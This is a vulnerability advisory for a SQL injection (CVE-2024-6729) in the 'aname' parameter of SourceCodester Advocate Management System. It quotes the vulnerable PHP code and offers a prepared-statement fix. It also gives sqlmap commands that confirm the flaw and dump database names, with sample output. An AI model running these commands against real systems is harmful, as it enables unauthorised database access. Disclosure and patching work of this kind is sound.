CVE-2024-6729
Details
Attack type: SQL injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Vendor: SourceCodester
Product: Advocate Management System
Affected components: /control/add_act.php
Injection parameter: MULTIPART aname
POC
The add_acts.php file adds the user input directly into the SQL query, without any parameterization.
$aname = $_POST['aname'];   // user input read straight from the POST body, no validation
<SNIP>
$sql = "INSERT INTO legel_acts(act_name,status) VALUES ('$aname','1')";   // concatenated into the query string instead of bound as a parameter
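The following is an added example, not code from the advisory or from the vendor's application: the concatenation pattern quoted above beside a parameterised rewrite that a maintainer would apply to add_act.php. It assumes a mysqli connection, the table and column names quoted in the advisory, a 255-character length bound, and placeholder credentials.

```php
<?php
// Added example (not the vendor's code). Assumed: a mysqli connection and the
// table legel_acts(act_name, status) named in the advisory; the length bound
// and the connection details below are assumptions, not from the page.

// Vulnerable pattern, as the advisory describes it: the raw input is spliced
// into the query string, so a quote in 'aname' changes the SQL MySQL executes.
function add_act_vulnerable(mysqli $db, string $aname): bool
{
    $sql = "INSERT INTO legel_acts(act_name,status) VALUES ('$aname','1')";
    return $db->query($sql) === true;
}

// Hardened version: the statement text is fixed at prepare time and the value
// is bound separately, so the input can never alter the query structure.
function add_act_safe(mysqli $db, string $aname): bool
{
    // Reject empty and over-long names up front (length bound is an assumption).
    $aname = trim($aname);
    if ($aname === '' || mb_strlen($aname) > 255) {
        return false;
    }
    $stmt = $db->prepare("INSERT INTO legel_acts(act_name, status) VALUES (?, '1')");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $aname);  // 's': bound as a string value, never as SQL text
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Handler sketch for /control/add_act.php (constructed; credentials are placeholders).
$db = new mysqli('localhost', 'dbuser', 'dbpass', 'kortex_lite');
if ($db->connect_error) {
    http_response_code(500);
    exit('database unavailable');
}
$db->set_charset('utf8mb4');  // keep charset and escaping rules consistent

if (add_act_safe($db, $_POST['aname'] ?? '')) {
    echo 'act added';
} else {
    http_response_code(400);
    echo 'invalid act name';
}
```

With the prepared statement in place, re-running the sqlmap command below against the saved request should report the aname parameter as not injectable.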
Intercept request using Burpsuite Proxy.
Save the request to control.add_act.txt.
The vulnerability can be verified with the following command:
sqlmap -r control.add_act.txt --batch
Parameter: MULTIPART aname ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------8879615583215427378340903645
Content-Disposition: form-data; name="aname"
The databases can be dumped with the following command:
sqlmap -r control.add_act.txt --batch --dbs
[04:20:26] [INFO] fetching database names
[04:20:26] [INFO] resumed: 'information_schema'
[04:20:26] [INFO] resumed: 'kortex_lite'
available databases [2]:
[*] information_schema
[*] kortex_lite